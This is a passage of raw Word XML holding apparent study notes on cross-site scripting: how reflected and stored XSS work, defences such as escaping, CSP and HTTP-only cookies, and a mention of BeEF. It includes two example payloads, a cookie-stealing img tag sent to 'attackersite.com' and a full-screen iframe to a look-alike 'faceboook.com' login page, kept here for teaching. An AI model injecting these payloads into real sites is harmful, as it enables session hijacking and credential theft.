      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>URL with malicious text) and send it to victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5960C817" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Victim tricked into requesting URL from website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E9062D" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Website includes the malicious string in response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369ED4CC" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Malicious scripts are executed from response and sends cookie to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>attackers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E4E0F3" w14:textId="6B584012" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="004F2A27">
        <w:t>XSS makes use of improper treatment of dynamic content from a backend data store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0656780B" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Stores/Persistent XSS: If a page is vulnerable to this, will execute injected script every time page is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4800FB" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>If one inspects source code, can see where data has gone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5A85DB" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACE1940" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Attacker Sends crafted payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAB54F0" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Victim logs in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE646DE" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Victim visits list of pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3977A8" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The server then responds with the attackers JavaScript </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB04D0A" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Pop-up is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A198BF" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Victims</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> browser then sends session cookies to attacker who then hijacks the session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F720F02" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Examples: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FED07DA" w14:textId="0C05A405" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A32A69">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A32A69">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A32A69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A32A69">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A32A69">
        <w:t xml:space="preserve"> ='</w:t>
      </w:r>
      <w:r w:rsidRPr="00543599">
        <w:t>http://attackersite.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00543599">
        <w:t>index.php?cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00543599">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00A32A69">
        <w:t xml:space="preserve"> '+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A32A69">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A32A69">
        <w:t xml:space="preserve"> &gt; allows one to steal a sessions cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF216F0" w14:textId="77777777" w:rsidR="00543599" w:rsidRPr="00A32A69" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00A32A69">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A32A69">
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A32A69">
        <w:t xml:space="preserve"> style=' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A32A69">
        <w:t>position:fixed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A32A69">
        <w:t xml:space="preserve">; top:0px; left:0px bottom:0px; right:0px; width:100%; height:100%; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A32A69">
        <w:t>border:none</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A32A69">
        <w:t xml:space="preserve">; margin:0; padding:0; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A32A69">
        <w:lastRenderedPageBreak/>
        <w:t>overflow:hidden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A32A69">
        <w:t xml:space="preserve">; z-index:999999;'' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A32A69">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A32A69">
        <w:t>='http://faceboook.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A32A69">
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A32A69">
        <w:t>' &gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A32A69">
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A32A69">
        <w:t xml:space="preserve">&gt; allows us to harvest credentials </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539F3CF3" w14:textId="77777777" w:rsidR="00543599" w:rsidRPr="00A32A69" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="064751D5" w14:textId="2261364C" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVSS Score: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A32A69">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="066CC473" wp14:editId="7AACC4BB">
            <wp:extent cx="4707670" cy="2684780"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1077155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559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378" cy="26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67A1" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>To protect from XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A1566A" w14:textId="77777777" w:rsidR="00543599" w:rsidRPr="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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543599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Escape Dynamic Content</w:t>
      </w:r>
      <w:r w:rsidRPr="00543599">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>: Properly encode data before rendering it in a browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587D12EC" w14:textId="77777777" w:rsidR="00543599" w:rsidRPr="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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543599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Whitelist Inputs</w:t>
      </w:r>
      <w:r w:rsidRPr="00543599">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>: Restrict allowed values (e.g., dropdown lists).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514BCF96" w14:textId="77777777" w:rsidR="00543599" w:rsidRPr="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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543599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Content Security Policy (CSP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00543599">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>: Specify allowed sources for scripts, preventing unauthorized execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64677DE3" w14:textId="77777777" w:rsidR="00543599" w:rsidRPr="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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543599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Sanitize HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00543599">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>: Use libraries to clean inputs of malicious scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715569D8" w14:textId="77777777" w:rsidR="00543599" w:rsidRPr="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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543599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HTTP-only Cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="00543599">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>: Prevent JavaScript from accessing sensitive cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CA7163" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Browser Exploitation Framework project (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) is a pen test tool which focus on the web browser, and using it, can launch hacking attacks on workstation within protected perimeter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166E604F" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599"/>
    <w:p w14:paraId="7D56D43D" w14:textId="77777777" w:rsidR="00543599" w:rsidRDefault="00543599" w:rsidP="00543599"/>
    <w:p w14:paraId="12C847D1" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC"/>
    <w:p w14:paraId="5BA25362" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D2DBA34" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRPr="004F2A27" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="544BB8CC" w14:textId="77777777" w:rsidR="00A32A69" w:rsidRDefault="00A32A69" w:rsidP="00A32A69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A32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C1DEA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B3488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75ED4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="77461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B6ED8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="24B0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55C49"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4B50D3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51486">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1846742462">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1218855162">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="6032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93"/>
    <w:rsid w:val="000941AB"/>
    <w:rsid w:val="001D376A"/>
    <w:rsid w:val="00237FBB"/>
    <w:rsid w:val="003B5116"/>
    <w:rsid w:val="00402131"/>
    <w:rsid w:val="00452E14"/>
    <w:rsid w:val="004C64A5"/>
    <w:rsid w:val="004F2A27"/>
    <w:rsid w:val="00543599"/>
    <w:rsid w:val="0069369E"/>
    <w:rsid w:val="006D70B7"/>
    <w:rsid w:val="008C74CC"/>
    <w:rsid w:val="00A14D21"/>
    <w:rsid w:val="00A32A69"/>
    <w:rsid w:val="00AB6B98"/>
    <w:rsid w:val="00AD39B4"/>
    <w:rsid w:val="00B96893"/>
    <w:rsid w:val="00C379D3"/>
    <w:rsid w:val="00CF615B"/>
    <w:rsid w:val="00E0422F"/>
    <w:rsid w:val="00FB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130F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{60326398-5D82-45CE-9BEE-9B5BE188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8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A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A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43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43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7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-06T19:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-08T20:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>